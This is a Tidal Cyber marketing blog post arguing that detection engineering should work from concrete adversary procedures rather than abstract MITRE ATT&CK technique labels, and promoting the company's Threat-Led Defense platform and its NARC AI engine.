Tidal Cyber Blog

What Procedures Actually Represent and Why They Are Critical to Your Defensive Strategy

Written by Tidal Cyber | May 6, 2026 2:30:00 PM

Most security teams can map an attack to a technique in seconds. Very few can explain exactly how that attack would be executed in their environment.

That gap is not theoretical. It is where most detection failures occur.

Techniques, as defined in frameworks like MITRE ATT&CK, is a framework and structure that describes categories of adversary behavior. They tell you what an attacker is doing at a high level. They do not capture how an attacker operates and executes an attack in a real system, under real constraints, with real variations.

This is where abstraction breaks down. A technique can represent dozens of execution paths, each with different commands, dependencies, and outcomes. Detection built at that level assumes consistency that does not exist in practice.

As a result, teams operate with visibility into categories of activity, but not into actual sequences that determine whether an attack succeeds or fails. Coverage looks complete on paper. In execution, it is uneven and unreliable.

The missing layer is procedures; the exact steps an attacker takes to move from access to impact. Without that layer, defenders are not validating their defenses against how attacks actually run. They are validating against how attacks are described.

 

What Procedures Actually Represent

Procedures capture how an adversary actually executes an attack and the steps they take to execute.

They are not labels or categories. They are the exact sequence of actions an attacker performs to achieve an objective within a specific environment.

At this level, an attack is no longer abstract. It is concrete and constrained.
It includes the commands used, how they are structured, where they run, and what they depend on to succeed.

A procedure answers questions that techniques cannot:

  • What command was executed, and with which arguments?
  • What user or process context is required?
  • What had to exist beforehand for the action to work?
  • What happened immediately before and after execution?

This is where detection either works or fails.

A technique like “Command and Scripting Interpreter” can represent anything from a simple script execution to a chained sequence of encoded commands, environment checks, and privilege escalation steps. At the technique level, these all look the same. At the procedure level, they behave completely differently.

That difference matters.

Detection logic operates on specific patterns, command lines, process relationships, and execution context. If those patterns are derived from abstraction, they assume consistency across executions. In reality, attackers vary commands, adjust parameters, and change execution flow to bypass static detection.

Procedures capture that variation. They show how an attacker adapts in practice, not how it is categorized.

Without procedures, defenders are not working with real attack execution. They are working with simplified representations of behavior that remove the details most likely to cause detection failure.

 

Why Abstraction Fails

Abstraction was introduced to make ATT&CK data usable at scale. It organizes behavior into clean, consistent categories. That works for communication and reporting. It breaks down at execution.

A single technique in MITRE ATT&CK can represent dozens of real-world procedures. Each of those procedures can differ in command structure, encoding, parent-child process relationships, privilege context, and sequencing. Detection does not operate on the technique label. It operates on those details.

When defenses are built at the technique level, they assume that these variations behave similarly enough to be detected by the same logic. That assumption does not hold.

Attackers do not execute techniques. They execute commands. They chain actions. They adjust parameters based on what is available in the environment. Small changes like encoding a payload, switching interpreters, and modifying execution flow can bypass detections that appear correct at the abstract level.

This is where the gap emerges.

Coverage models report that a technique is “monitored” or “detected.” In reality, only a subset of possible executions for that technique are covered. The rest falls into the gaps between variations.

The problem is not visibility. It is precision.

Abstraction removes the details that determine whether detection succeeds. As a result, teams can have high coverage on paper while missing the exact execution paths attackers use in practice.

 

Why Procedures Are Hard to Work With

Procedures are not delivered in a clean format.

They are buried in unstructured sources such as incident reports, threat research blogs, reverse engineering notes, and partial disclosures. Each source captures only a fragment of the full execution. Commands may be shown without context. Context may be described without exact commands. Critical steps are often implied, not documented.

Reconstructing a full procedure requires stitching these fragments together.

That process is manual and time-consuming. It requires interpreting intent, filling gaps, and validating assumptions against how systems actually behave. Even then, the result is not static. Attackers modify execution constantly by changing tools, adjusting parameters, or reordering steps to evade detection.

This creates two problems.

First, procedures are difficult to standardize. Unlike techniques, they do not fit neatly into predefined categories. Each procedure is tied to a specific execution path, which may not generalize cleanly across environments.

Second, procedures do not scale easily. Maintaining an accurate, up-to-date set of procedures requires continuous extraction, validation, and refinement. Most teams do not have the time or resources to do this consistently.

This is why many vendors stop at abstraction. Techniques are structured, stable, and easy to map. Procedures are dynamic, fragmented, and expensive to maintain.

But those same characteristics are what make procedures operationally valuable. They reflect how attacks actually run, not how they are summarized.

 

What Defenders Are Missing

When procedures are not part of the model, defenders are forced to operate on assumptions.

Detection logic is built from generalized patterns rather than verified execution paths. Rules are written to match a technique, not the way that technique is actually used in an attack. This creates coverage that looks complete but is shallow in practice.

The gaps are not obvious.

A detection may trigger a known command pattern but fail when that same command is slightly modified, encoded, or executed under a different parent process. Another detection may rely on a specific sequence of events that does not match how the attack actually unfolds in a real environment. These failures are not visible at the technique level because the abstraction hides variation.

As a result, teams cannot reliably answer a basic question: Can I defend against this adversary procedure and how the attack is actually executed?

Instead, they validate against simplified representations. Testing is performed against expected behavior, not realistic behavior. This leads to detections that pass validation but fail under adversarial conditions.

The outcome is consistent.

Coverage appears strong in dashboards.
Detection performance is inconsistent in practice.

Without procedures, defenders lack the layer that connects intelligence to execution. They can see categories of attack activity, but they cannot evaluate whether their controls will hold when those attacks are carried out with real-world variation.

 

The Shift to Procedure-Led Intelligence

Closing the gap requires moving from abstract mapping to execution-level understanding.

Procedure-led intelligence focuses on how attacks actually run. It captures the full execution chain such as commands, context, dependencies, and sequencing and makes that data usable for detection and validation.

This changes how defenses are built.

Instead of writing detections against a technique label, teams build against verified execution paths. Instead of assuming how an attack behaves, they test against how it has actually been observed to behave. Variation is no longer an edge case. It becomes part of the model.

This approach also changes how gaps are identified.

At the technique level, gaps are inferred. At the procedure level, they are observable. If a specific execution path is not detected, the failure is explicit. Teams can see exactly where detection breaks; whether it is a missing command pattern, an untracked process relationship, or a blind spot in execution context.

The result is not more data. It is more precise data.

Procedure-led intelligence connects threat intelligence directly to detection logic. It removes the need to guess how an attack might execute and replaces it with evidence of how it does execute.

 

Why Tidal Cyber and Threat-Led Defense

Most platforms organize intelligence around what is easy to structure. Techniques are predefined, stable, and align cleanly with frameworks like MITRE ATT&CK. That makes them easy to map, visualize, and report. It does not make them operationally complete.

The Tidal Cyber Threat-Led Defense platform actually operationalizes intelligence at the procedures level.The focus is not on mapping intelligence into categories. It is aligning defenses against how attackers actually execute. This means extracting procedures from unstructured sources like incident reports, threat research, and fragmented disclosures, and converting them into structured, usable execution models and capturing them into a knowledge base.

That process requires more than aggregation. It involves identifying command patterns, resolving missing context, linking dependent steps, and validating how those steps interact in a real environment. The output is not a label. It is a sequence.

Tidal Cyber does exactly this through NARC, the proprietary AI engine behind Threat-Led Defense.

Where abstraction simplifies behavior into a category, procedure-led modeling preserves the execution specifics that determine whether your defenses succeed or fail. As a result, procedure-led intelligence becomes directly usable for detection engineering and validation readiness. Teams are no longer working from possibility. They are working from reality.